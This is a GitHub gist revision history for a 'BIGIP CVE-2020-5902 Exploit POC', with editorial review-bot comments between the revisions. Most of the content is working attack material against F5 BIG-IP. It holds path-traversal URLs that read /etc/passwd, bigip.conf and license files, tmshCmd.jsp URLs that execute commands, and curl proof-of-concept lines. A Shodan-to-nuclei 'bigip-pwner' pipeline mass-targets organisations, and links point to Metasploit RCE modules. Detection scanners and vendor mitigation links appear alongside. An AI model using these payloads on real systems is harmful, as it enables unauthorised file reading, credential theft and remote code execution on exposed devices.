Revisions
cihanmehmet revised this gist
Jul 8, 2020 . 1 changed file with 18 additions and 3 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -29,10 +29,16 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ```yaml https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ ``` ## 🔸RCE 💦 ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` ```yaml https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC 🔥 ```ruby @@ -76,12 +82,12 @@ nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ## 🚩CVE-2020-5902 Scanner Python Script ⭐️🚩 https://github.com/jas502n/CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## 🌐 Online BIG-IP F5 CVE-2020-5902 Checker ```diff 
@@ -103,9 +109,18 @@ https://github.com/rapid7/metasploit-framework/pull/13807# https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 ## 🚨RCE 💢 https://twitter.com/chybeta/status/1279807030740516865?s=21 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/ ## 📝K52145254: TMUI RCE vulnerability CVE-2020-5902 Mitigation https://support.f5.com/csp/article/K52145254?sf235665517=1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## Explaining CVE 2020-5902 and how to mitigate https://www.youtube.com/watch?v=-_v8D4MWPCc -
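Review bot: in the `-103` hunk the F5 advisory K52145254 and the "how to mitigate" video sit at the very bottom, below the Metasploit and RCE references. They are the remediation pointers visible in this hunk, so move the mitigation section to the top of the file, where a reader checking their own device reaches the vendor fix before anything else.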
cihanmehmet revised this gist
Jul 7, 2020 . 1 changed file with 5 additions and 1 deletion.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -29,7 +29,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## 🔸RCE 💦 ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` @@ -105,3 +105,7 @@ https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf0 ## 🚨RCE https://twitter.com/chybeta/status/1279807030740516865?s=21 ## 📝K52145254: TMUI RCE vulnerability CVE-2020-5902 Mitigation https://support.f5.com/csp/article/K52145254?sf235665517=1 -
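Review bot: the K52145254 link in the `-105` hunk carries a `?sf235665517=1` query string, which looks like a share-tracking parameter rather than part of the article address; link `https://support.f5.com/csp/article/K52145254` instead. The same applies to `?s=21` on the Twitter status URL just above it.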
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 1 addition and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -91,6 +91,7 @@ http://threatintel.xyz/F5checker.php ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ` shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ` -
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 5 additions and 2 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -41,6 +41,9 @@ curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp? ```bash curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` ` curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | grep -q Vulnerable && printf '\033[0;31mVulnerable\n' || printf '\033[0;32mNot Vulnerable\n' ` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 📜 Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml @@ -88,9 +91,9 @@ http://threatintel.xyz/F5checker.php ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ` shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ` ## 🔨💣 RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# -
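Review bot: in the `-41` hunk the one-line check `curl -sk ... | grep -q Vulnerable && printf ... || printf ...` prints "Not Vulnerable" whenever grep finds no match, which includes a timeout, a refused connection or any other curl failure, so an unreachable host is reported as safe. Test curl's exit status separately (for example with `--fail` and a distinct "no response" message) before interpreting the grep result, and end both printf strings with `\033[0m` so the terminal colour is reset afterwards.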
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 6 additions and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -11,6 +11,12 @@ http.favicon.hash:-335242539 "3992" org:"Organization Name" ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```ruby https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp ``` ```yaml https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release ``` ```powershell https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` -
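Review bot: the fences in the `-11` hunk are tagged `console`, `ruby`, `yaml` and `powershell`, yet each wraps a single URL, so the language tags only change the highlight colour and mislead anyone scanning the file for runnable commands. Use one untagged or `text` fence for the URL list and keep language tags for the blocks that really are shell commands.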
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 9 additions and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -46,6 +46,15 @@ nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  ### 🧱🔨 Jaeles Detect CVE-2020-5902 🔋 https://github.com/jaeles-project/jaeles-signatures/blob/master/common/bigip-cve-2020-5902.yaml ```console jaeles scan -s bigip-cve-2020-5902.yaml -U https_url.txt ```  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🔎 NMAP Script for CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell -
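Review bot: the Jaeles section in the `-46` hunk is introduced with `###` while the sibling section right after it (`## 🔎 NMAP Script for CVE-2020-5902`) uses `##`, so in the rendered outline Jaeles nests under the preceding Nuclei section instead of standing beside it. Use `##` to match the other tool sections.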
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 7 additions and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,12 @@ # 🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## Shodan Seaarch ```console title:"Big-IP®" org:"Organization Name" http.title:"BIG-IP®- Redirect" org:"Organization Name" http.favicon.hash:-335242539 "3992" org:"Organization Name" ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🔸LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd -
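Review bot: the heading `## Shodan Seaarch` in the `-1` hunk has a typo and should read `## Shodan Search`. The block under it holds search-filter strings, not terminal input, so an untagged fence fits better than `console`, and a one-line note that `org:"Organization Name"` is a placeholder to be replaced with the reader's own organisation would make the intended scope clear.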
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 5 additions and 2 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -55,10 +55,13 @@ https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner https://github.com/jas502n/CVE-2020-5902 ## 🌐 Online BIG-IP F5 CVE-2020-5902 Checker ```diff - 🤷♂️ Note: Not Safe(it may be collecting information in the background.) ``` http://threatintel.xyz/F5checker.php ## 💡 Automate Find CVE-2020-5902 🔎 -
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 6 additions and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -55,6 +55,12 @@ https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## 🌐 Online BIG-IP F5 CVE-2020-5902 Checker 🤷♂️ Note: Not Safe(it may be collecting information in the background.) http://threatintel.xyz/F5checker.php ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ```console -
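Review bot: the `-55` hunk links a third-party checker over plain `http://` and warns only that it is "Not Safe"; say what the risk is, namely that submitting a hostname tells the site operator which device is being checked, or drop the link in favour of the scanner scripts listed just above it, which run locally.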
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 7 additions and 4 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ # 🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🔸LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` @@ -16,7 +16,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## 🔸RCE ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` @@ -61,9 +61,12 @@ https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-th shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ``` ## 🔨💣 RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# `modules/exploits/linux/http/f5_bigip_tmui_rce.rb` https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 ## 🚨RCE https://twitter.com/chybeta/status/1279807030740516865?s=21 -
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 2 additions and 2 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,6 @@ # 🔸BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` @@ -16,7 +16,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## RCE ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` -
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 1 addition and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -65,4 +65,5 @@ shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --s https://github.com/rapid7/metasploit-framework/pull/13807# `modules/exploits/linux/http/f5_bigip_tmui_rce.rb` https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 -
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 3 additions and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -63,3 +63,6 @@ shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --s ## 🔨RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# `modules/exploits/linux/http/f5_bigip_tmui_rce.rb` https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 -
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 6 additions and 5 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ # 🔸BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## LFI ```console @@ -49,16 +49,17 @@ nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ```  ## 🚩CVE-2020-5902 Scanner Python Script https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## 💡 Automate Find CVE-2020-5902 🔎 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ```console shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ``` ## 🔨RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# -
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 1 addition and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -51,6 +51,7 @@ nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ## CVE-2020-5902 Scanner Python Script https://github.com/dunderhay/CVE-2020-5902 -------- https://github.com/aqhmal/CVE-2020-5902-Scanner ## Automate Find CVE-2020-5902 -
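Review bot: the `--------` line placed between the two scanner links in the `-51` hunk is risky as a separator: if it sits directly under the `dunderhay/CVE-2020-5902` URL with no blank line in between, Markdown reads it as a setext underline and renders that URL as a level-2 heading. Put a blank line on both sides of it, or use the `- - - -` rule the rest of the file already uses.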
cihanmehmet revised this gist
Jul 6, 2020 . 1 changed file with 22 additions and 4 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,9 +1,10 @@ # 🔸BIGIP CVE-2020-5902 Exploit POC 👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## LFI ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```powershell https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` ```ruby @@ -15,6 +16,10 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## RCE ```console https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC 🔥 ```ruby @@ -42,4 +47,17 @@ wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve ```console nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ```  ## CVE-2020-5902 Scanner Python Script https://github.com/dunderhay/CVE-2020-5902 https://github.com/aqhmal/CVE-2020-5902-Scanner ## Automate Find CVE-2020-5902 https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77 ```console shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml ``` ## RCE Metasploit CVE-2020-5902 https://github.com/rapid7/metasploit-framework/pull/13807# -
cihanmehmet revised this gist
Jul 5, 2020 . 1 changed file with 11 additions and 2 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ # 🔸 BIGIP CVE-2020-5902 Exploit POC 👀 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd @@ -16,7 +16,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC 🔥 ```ruby curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` @@ -34,3 +34,12 @@ nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  ## 🔎 NMAP Script for CVE-2020-5902 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse ``` ```console nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse ```  -
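Review bot: the `wget` line in the `-34` hunk fetches `http-vuln-cve2020-5902.nse` from the `master` branch of a personal repository, and the next command runs it with nmap, so whatever that branch holds at download time is what gets executed. Put a specific commit in the raw URL in place of `master`, and add a line telling readers to read the script before running it.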
cihanmehmet revised this gist
Jul 5, 2020 . 1 changed file with 12 additions and 4 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,12 +1,12 @@ # 🔸 BIGIP CVE-2020-5902 Exploit POC - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```console https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` ```ruby https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa ``` ```bash @@ -15,14 +15,22 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 🎯 Manuel POC ```ruby curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` ```bash curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 📜 Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml ```console nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt ```  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  -
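Review bot: the two curl examples under `## 🎯 Manuel POC` in the `-15` hunk are identical apart from the `{host}` and `{IP}` placeholder, and the first is fenced as `ruby` although it is a shell command; keep a single `bash` block and state once that the placeholder accepts a hostname or an IP address. The heading should also read "Manual".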
cihanmehmet revised this gist
Jul 5, 2020 . 1 changed file with 10 additions and 4 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,5 @@ ## 🔸 BIGIP CVE-2020-5902 Exploit POC - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ```powershell https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` @@ -14,9 +15,14 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## 📜 Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml ```bash nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt ```  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  -
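Review bot: the nuclei command in the `-14` hunk hard-codes `~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml`, a path from the author's own machine that will not exist for most readers. Replace the prefix with a placeholder for the local templates directory, or say where the nuclei-templates repository is expected to be cloned, and describe what `https.txt` must contain (one URL per line).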
cihanmehmet revised this gist
Jul 5, 2020 . 1 changed file with 2 additions and 0 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,10 +5,12 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/ ```console https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` ```diff https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa ``` ```bash https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license ``` ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` -
cihanmehmet created this gist
Jul 5, 2020
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,20 @@ ## BIGIP CVE-2020-5902 Exploit POC ```powershell https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd ``` ```console https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp ``` https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa ``` ```bash https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license ```python https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf ``` ## Nuclei Detect CVE-2020-5902 https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml ```bash nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt ```
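Review bot: the fences in this initial version are unbalanced: the `getTabSet.jsp` URL follows a closing fence with no opening one, and the `bash` block holding the `bigip.license` URL is never closed before the `python` fence opens, so everything after the second block renders with code and prose swapped. Give each URL its own opening and closing fence.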